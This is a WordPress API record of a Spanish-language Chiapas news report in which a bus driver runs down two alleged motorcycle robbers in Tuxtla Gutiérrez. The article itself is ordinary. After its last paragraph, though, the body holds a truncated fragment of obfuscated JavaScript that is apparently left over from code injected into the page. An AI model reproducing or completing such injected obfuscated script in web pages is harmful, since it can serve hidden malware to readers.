{"id":19283,"date":"2024-12-13T02:58:02","date_gmt":"2024-12-13T02:58:02","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=19283"},"modified":"2024-12-13T02:58:02","modified_gmt":"2024-12-13T02:58:02","slug":"chofer-de-colectivo-atropello-a-delincuentes","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=19283","title":{"rendered":"Chofer de colectivo atropell\u00f3 a delincuentes"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"769\" data-id=\"19284\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1734058610760-1024x769.jpg\" alt=\"\" class=\"wp-image-19284\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1734058610760-1024x769.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1734058610760-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1734058610760-768x577.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1734058610760.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"769\" data-id=\"19285\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1734058613371-1024x769.jpg\" alt=\"\" class=\"wp-image-19285\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1734058613371-1024x769.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1734058613371-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1734058613371-768x577.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1734058613371.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"769\" data-id=\"19286\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1734058606914-1024x769.jpg\" alt=\"\" class=\"wp-image-19286\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1734058606914-1024x769.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1734058606914-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1734058606914-768x577.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/12\/FB_IMG_1734058606914.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 12 de diciembre del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este jueves por la noche el conductor de un colectivo con n\u00famero econ\u00f3mico 12 de la ruta Berrioz\u00e1bal-Tuxtla Guti\u00e9rrez atropell\u00f3 a dos sujetos que presuntamente lo intentaron asaltar a la altura de la 13 Sur entre 2a y 3a Poniente en el Barrio San Francisco de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>De acuerdo con el testimonio del conductor los ocupantes de la moto de emparejaron y al resistirse al atraco dispararon al aire.<\/p>\n\n\n\n<p>Al no tener \u00e9xito intentaron escapar sin embargo en una acci\u00f3n r\u00e1pida el conductor les dio alcance y los embisti\u00f3.<\/p>\n\n\n\n<p>Los delincuentes cayeron y se lesionaron pese a ello, se levantaron y escaparon corriendo rumbo al poniente de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>Al arribo de las autoridades y tomar el testimonio levantaron las unidades que fueron puestas a disposici\u00f3n del Ministerio P\u00fablico para deslindar responsabilidades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 12 de diciembre del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este jueves por la noche el conductor de un colectivo con n\u00famero econ\u00f3mico 12 de la ruta Berrioz\u00e1bal-Tuxtla Guti\u00e9rrez atropell\u00f3 a dos sujetos que presuntamente lo intentaron asaltar a la altura de la 13 Sur entre 2a y 3a Poniente en el Barrio &hellip;<\/p>\n","protected":false},"author":2,"featured_media":19286,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-19283","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19283","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=19283"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19283\/revisions"}],"predecessor-version":[{"id":19287,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/19283\/revisions\/19287"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/19286"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=19283"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=19283"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=19283"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}